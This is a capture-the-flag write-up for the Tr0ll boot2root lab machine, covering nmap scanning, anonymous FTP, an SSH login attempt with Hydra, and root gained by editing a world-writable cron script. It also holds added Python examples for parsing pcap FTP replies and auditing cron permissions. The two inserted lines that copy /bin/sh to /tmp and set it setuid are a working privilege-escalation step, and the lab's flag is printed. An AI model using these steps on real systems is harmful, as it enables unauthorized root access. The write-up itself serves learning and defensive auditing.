
Tr0ll: 1

Tr0ll is a boot2root, from Maleus. It was inspired by the constant trolling of the machines within the OSCP labs. The goal is simple, gain root and get Proof.txt from the /root directory. Not for the easily frustrated! Fair warning, there be trolls ahead!

Nmap

root@kali:~# nmap -n -A -p- 192.168.127.103
 
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx    1 1000     0            8068 Aug 10 00:43 lol.pcap [NSE: writeable]
22/tcp open  ssh     (protocol 2.0)
| ssh-hostkey:
|   1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
|   2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
|_  256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/secret
|_http-title: Site doesn't have a title (text/html).

Starting from the top, anonymous FTP login is permitted and Nmap has listed the root directory. I logged in manually and downloaded lol.pcap.

root@kali:~/vuln/tr0ll# strings lol.pcap
[...snip...]
W150 Opening BINARY mode data connection for secret_stuff.txt (147 bytes).
WWell, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P
Sucks, you were so close... gotta TRY HARDER!
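strings(1) gets the job done here, but it flattens the capture: the W glued onto 150 above is just a stray printable byte that happened to precede the reply. Reading the pcap structurally is more reliable when a capture is bigger than this one. As an added example, not code from the original writeup, the parser below walks the pcap records, picks out IPv4/TCP frames, and collects the server's FTP reply lines (three-digit code followed by a space or a dash) from the control port. The capture it runs on is constructed inline and is not the real lol.pcap:

```python
"""Extract FTP control-channel replies from a pcap with a small hand-rolled parser.

Added example for this writeup (not the author's code). The capture bytes below
are constructed here so the script runs offline; they are not the real lol.pcap.
"""
import struct

# Classic pcap magic values and the byte order each implies for the file headers.
_MAGICS = {
    b"\xd4\xc3\xb2\xa1": "<",  # 0xA1B2C3D4 little-endian (microsecond timestamps)
    b"\xa1\xb2\xc3\xd4": ">",  # big-endian
    b"\x4d\x3c\xb2\xa1": "<",  # 0xA1B23C4D little-endian (nanosecond timestamps)
    b"\xa1\xb2\x3c\x4d": ">",
}


def iter_tcp_payloads(pcap: bytes):
    """Yield (src_port, dst_port, payload) for every IPv4/TCP frame in an Ethernet pcap."""
    end = _MAGICS.get(pcap[:4])
    if end is None:
        raise ValueError("not a classic pcap file")
    off = 24                                   # global header is 24 bytes
    while off + 16 <= len(pcap):
        _, _, incl_len, _ = struct.unpack_from(end + "IIII", pcap, off)
        frame = pcap[off + 16: off + 16 + incl_len]
        off += 16 + incl_len
        if len(frame) < 34 or frame[12:14] != b"\x08\x00":   # EtherType must be IPv4
            continue
        ip = frame[14:]
        ihl = (ip[0] & 0x0F) * 4
        total_len = struct.unpack_from("!H", ip, 2)[0]
        if ip[9] != 6:                          # protocol 6 = TCP
            continue
        tcp = ip[ihl:total_len]
        sport, dport = struct.unpack_from("!HH", tcp, 0)
        data_off = (tcp[12] >> 4) * 4
        yield sport, dport, tcp[data_off:]


def ftp_replies(pcap: bytes, ctrl_port: int = 21):
    """Return [(code, text)] for server replies on the FTP control channel.
    A reply line is a 3-digit code, then a space (final line) or '-' (multi-line)."""
    out = []
    for sport, _dport, payload in iter_tcp_payloads(pcap):
        if sport != ctrl_port:
            continue
        for line in payload.decode("ascii", "replace").splitlines():
            if len(line) >= 4 and line[:3].isdigit() and line[3] in " -":
                out.append((int(line[:3]), line[4:]))
    return out


# --- constructed sample capture (not real traffic from the box) ---
def _frame(payload: bytes, sport: int = 21, dport: int = 40000) -> bytes:
    eth = b"\x00" * 12 + b"\x08\x00"          # zero MACs, EtherType IPv4
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 0x50, 0x18, 8192, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp) + len(payload), 0, 0,
                     64, 6, 0, bytes([10, 0, 0, 1]), bytes([10, 0, 0, 2]))
    return eth + ip + tcp + payload


def build_sample_pcap() -> bytes:
    header = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)  # linktype 1 = Ethernet
    body = b""
    for f in (_frame(b"220 (vsFTPd 3.0.2)\r\n"),
              _frame(b"USER anonymous\r\n", sport=40000, dport=21),   # client side, ignored
              _frame(b"150 Opening BINARY mode data connection for secret_stuff.txt (147 bytes).\r\n")):
        body += struct.pack("<IIII", 0, 0, len(f), len(f)) + f
    return header + body


if __name__ == "__main__":
    for code, text in ftp_replies(build_sample_pcap()):
        print(code, text)
```

Only the server side of the control channel is kept, so client commands such as USER and PASS are dropped; checksums in the constructed frames are left at zero because the parser never validates them.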

Having a look around the Apache service reveals a few friendly images.

Other tools such as nikto didn’t turn up anything more. After a little pondering I decided to try sup3rs3cr3tdirlol as a directory in the URL, and was presented with the following page:

I downloaded roflmao, which turned out to be a binary that does nothing more than print the following message:

Find address 0x0856BF to proceed

This has the potential to send you on a massive goose chase, but I was now thinking like a proper troll :p. Address… Web address…?

Heh, nice. These directories contain the following files:

Index of /0x0856BF/good_luck
[TXT]     which_one_lol.txt     2014-08-09 23:32      109
 
maleus
ps-aux
felux
Eagle11
genphlux < -- Definitely not this one
usmc8892
blawrg
wytshadow
vis1t0r
overflow
Index of /0x0856BF/this_folder_contains_the_password
[TXT]     Pass.txt     2014-08-09 23:18      12 
 
Good_job_:)

I took the list in which_one_lol.txt as potential usernames and the string Good_job_:) as the password, and ran them through Hydra against SSH. Unfortunately, after about 7-8 incorrect logins the SSH service closes for a while before coming back up. Hydra doesn’t seem to save its session when this happens, so carrying on after the service comes back up didn’t seem possible. In the end I just tried the logins manually, since there weren’t actually that many.

However, this password was not valid for any of these accounts :(

More trolls however - if we recall the name of the directory, this_folder_contains_the_password. What’s in that folder? Pass.txt. Try the filename as a password…?

I finally got a successful login with overflow:Pass.txt. Woop.

SSH

I started some basic enumeration until this happened:

Broadcast Message from root@troll
        (somewhere) at 9:20 ...

TIMES UP LOL!

Connection to 192.168.127.103 closed by remote host.

Oh for God’s sake, haha. This seems to happen every five minutes or so, but you can just reconnect each time.

I got a hit whilst searching for world-writable files.

find / -perm -0002 -type f -print
[...snip...]
/lib/log/cleaner.py
 
-rwxrwxrwx 1 root root 96 Aug 13 00:13 /lib/log/cleaner.py

A world-writable script owned by root? Jackpot (rasta_mouse braces himself for more trolls)…

#!/usr/bin/env python
import os
import sys
try:
        os.system('rm -r /tmp/* ')
except:
        sys.exit()

I simply added two new lines to this.

os.system('cp /bin/sh /tmp/sh')
os.system('chmod 4777 /tmp/sh')

I waited a few minutes and eventually my shell turned up!

-rwxrwxrwx 1 root root 112204 Aug 29 10:31 sh
# id
uid=1002(overflow) gid=1002(overflow) euid=0(root) groups=0(root),1002(overflow)
# whoami
root

Flag

From here, you can cat the flag.

# cat root/proof.txt
Good job, you did it!
 
702a8c18d29c6f3ca0d99ef5712bfbdc

I also wanted to see which scheduled jobs were behind the trolling, so here is the crontab and the script that does the five-minute kick (lmao.py):

*/5 * * * * /usr/bin/python /opt/lmao.py
*/2 * * * * /usr/bin/python /lib/log/cleaner.py

#!/usr/bin/env python
import os
import sys

os.system('echo "TIMES UP LOL!"|wall')
os.system("pkill -u 'overflow'")
sys.exit()
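The crontab explains both the five-minute kick and why the planted shell turned up within a couple of minutes: root runs /lib/log/cleaner.py every two minutes, and that file is world-writable. That combination, a privileged scheduled job whose script (or whose parent directory) other users can write, is exactly what a host audit should flag before anyone finds it the way this writeup did. As an added example, not the author's code or anything from the box, the script below parses crontab lines, pulls out every absolute path in the command, and reports targets that are world-writable or sit under a world-writable, non-sticky directory. The crontab and files it checks are constructed in a temporary directory that mirrors the writeup's layout:

```python
"""Audit cron entries for scripts (or their directories) that non-root users can write.

Added example for this writeup, not the author's code. The crontab lines and the
files they point at are constructed in a temporary directory so it runs offline.
"""
import os
import stat
import tempfile


def cron_targets(crontab_text: str):
    """Yield every absolute path mentioned in the command part of each cron line.
    Skips comments, blank lines and VAR=value assignments; handles @reboot-style lines."""
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if "=" in fields[0]:
            continue
        command = fields[1:] if fields[0].startswith("@") else fields[5:]
        for tok in command:
            if tok.startswith("/"):
                yield tok


def other_write(st: os.stat_result) -> bool:
    return bool(st.st_mode & stat.S_IWOTH)


def audit_crontab(crontab_text: str, stop_at: str = "/"):
    """Return {path: [issue, ...]} for cron targets that another user could tamper with.
    A world-writable file is the obvious case; a world-writable parent directory without
    the sticky bit is the subtle one, since the file can then be replaced rather than edited."""
    findings = {}
    for path in cron_targets(crontab_text):
        issues = []
        try:
            if other_write(os.stat(path)):
                issues.append("world-writable file")
        except FileNotFoundError:
            issues.append("target missing")
        parent = os.path.dirname(path)
        while parent.startswith(stop_at) and parent != stop_at:
            try:
                pst = os.stat(parent)
            except FileNotFoundError:
                break
            if other_write(pst) and not pst.st_mode & stat.S_ISVTX:
                issues.append("world-writable parent " + parent)
            parent = os.path.dirname(parent)
        if issues:
            findings[path] = issues
    return findings


def build_demo_tree():
    """Constructed fixture mirroring the writeup: a cron running a 0777 cleaner script
    every two minutes and a 0755 script every five. Returns (crontab, cleaner, lmao)."""
    root = tempfile.mkdtemp(prefix="cronaudit-")
    lib_log = os.path.join(root, "lib", "log")
    opt = os.path.join(root, "opt")
    os.makedirs(lib_log)
    os.makedirs(opt)
    cleaner = os.path.join(lib_log, "cleaner.py")
    lmao = os.path.join(opt, "lmao.py")
    for p in (cleaner, lmao):
        with open(p, "w") as fh:
            fh.write("#!/usr/bin/env python\n")
    os.chmod(cleaner, 0o777)      # the misconfiguration found in the writeup
    os.chmod(lmao, 0o755)
    crontab = (
        "*/5 * * * * /usr/bin/python {}\n"
        "*/2 * * * * /usr/bin/python {}\n".format(lmao, cleaner)
    )
    return crontab, cleaner, lmao


if __name__ == "__main__":
    crontab, cleaner, lmao = build_demo_tree()
    for path, issues in audit_crontab(crontab).items():
        print(path, "->", ", ".join(issues))
```

The interpreter path in each line is checked the same way as the script, so a missing or writable /usr/bin/python shows up too; on a real host you would feed it root's crontab, /etc/crontab and the /etc/cron.* directories.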